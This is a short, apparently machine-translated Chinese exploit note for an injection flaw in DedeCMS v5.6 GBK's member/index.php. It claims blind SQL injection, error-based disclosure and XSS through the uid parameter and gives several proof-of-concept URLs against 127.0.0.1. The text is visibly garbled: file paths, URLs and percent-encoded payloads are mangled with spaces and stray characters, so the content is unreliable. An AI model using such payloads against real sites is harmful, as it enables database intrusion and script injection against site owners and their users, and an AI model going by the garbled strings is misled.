DedeCMSv5.6GBK注入漏洞利用(会员/指标。PHP)
评论:会员中心主页(。 /会员/指标。PHP)的盲注功能过滤不严格,数据库错误模式,XSS口:
HTP: / / / /指数成员127.0.0.1。phpuid = # 039;% 20 | | % 20 # # 039;039;20 | | % 20 # 039;% % % % 9b B6 E6 E5 % % % % A3 B0 E4是9d % % % 97% A7 # E6 039;;;
会员中心主页(。 /会员/指标。PHP)功能的过滤不严格的盲注,数据库错误模式,XSS
口:
HTP: / / / /指数成员127.0.0.1。phpuid =% 20 | | % 20% 20 | | % 20 % % % % 9b B6 E6 E5 % % % % A3 B0 E4是% % % 97% A7的9d E6;
HTP: / / / /指数成员127.0.0.1。phpuid = % % % % 9b B6 E6 E5 % % % % A3 B0 E4是% % % 97% 9d E6 a7wfxssprobe / >)
HTP: / / / /指数成员127.0.0.1。phpuid = % % % % 9b B6 E6 E5 % % % % A3 B0 E4是% % % 97% 9d E6 A7>